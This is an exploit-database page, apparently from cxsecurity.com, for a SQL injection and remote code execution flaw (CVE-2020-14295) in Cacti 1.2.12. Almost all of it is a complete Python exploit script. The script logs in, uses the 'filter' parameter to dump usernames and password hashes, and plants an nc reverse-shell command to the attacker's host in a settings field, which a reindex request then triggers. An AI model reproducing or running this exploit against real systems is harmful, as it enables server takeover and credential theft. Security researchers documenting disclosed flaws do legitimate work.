Cacti 1.2.12 filter SQL Injection / Remote Code Execution

2021.04.29
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Cacti 1.2.12 - 'filter' SQL Injection / Remote Code Execution # Date: 04/28/2021 # Exploit Author: Leonardo Paiva # Vendor Homepage: https://www.cacti.net/ # Software Link: https://www.cacti.net/downloads/cacti-1.2.12.tar.gz # Version: 1.2.12 # Tested on: Ubuntu 20.04 # CVE : CVE-2020-14295 # Credits: @M4yFly (https://twitter.com/M4yFly) # References: # https://github.commandcom/Cacti/cacti/issues/3622 # https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295 #!/usr/bin/python3 import argparse import requests import sys import urllib.parse from bs4 import BeautifulSoup # proxies = {'http': 'http://127.0.0.1:8080'} def login(url, username, password, session): print("[+] Connecting to the server...") get_token_request = session.get(url + "/cacti/index.php", timeout=5) #, proxies=proxies) print("[+] Retrieving CSRF token...") html_content = get_token_request.text soup = BeautifulSoup(html_content, 'html.parser') csrf_token = soup.find_all('input')[0].get('value').split(';')[0] if csrf_token: print(f"[+] Got CSRF token: {csrf_token}") print("[+] Trying to log in...") data = { '__csrf_magic': csrf_token, 'action': 'login', 'login_username': username, 'login_password': password } login_request = session.post(url + "/cacti/index.php", data=data) #, proxies=proxies) if "Invalid User Name/Password Please Retype" in login_request.text: print("[-] Unable to log in. Check your credentials") sys.exit() else: print("[+] Successfully logged in!") else: print("[-] Unable to retrieve CSRF token!") sys.exit() def exploit(lhost, lport, session): rshell = urllib.parse.quote(f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost} {lport} >/tmp/f") payload = f"')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='{rshell};'+where+name='path_php_binary';--+-" exploit_request = session.get(url + f"/cacti/color.php?action=export&header=false&filter=1{payload}") #, proxies=proxies) print("\n[+] SQL Injection:") print(exploit_request.text) try: session.get(url + "/cacti/host.php?action=reindex", timeout=1) #, proxies=proxies) except Exception: pass print("[+] Check your nc listener!") if __name__ == '__main__': parser = argparse.ArgumentParser(description='[*] Cacti 1.2.12 - SQL Injection / Remote Code Execution') parser.add_argument('-t', metavar='<target/host URL>', help='target/host URL, example: http://192.168.15.58', required=True) parser.add_argument('-u', metavar='<user>', help='user to log in', required=True) parser.add_argument('-p', metavar='<password>', help="user's password", required=True) parser.add_argument('--lhost', metavar='<lhost>', help='your IP address', required=True) parser.add_argument('--lport', metavar='<lport>', help='your listening port', required=True) args = parser.parse_args() url = args.t username = args.u password = args.p lhost = args.lhost lport = args.lport session = requests.Session() login(url, username, password, session) exploit(lhost, lport, session)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top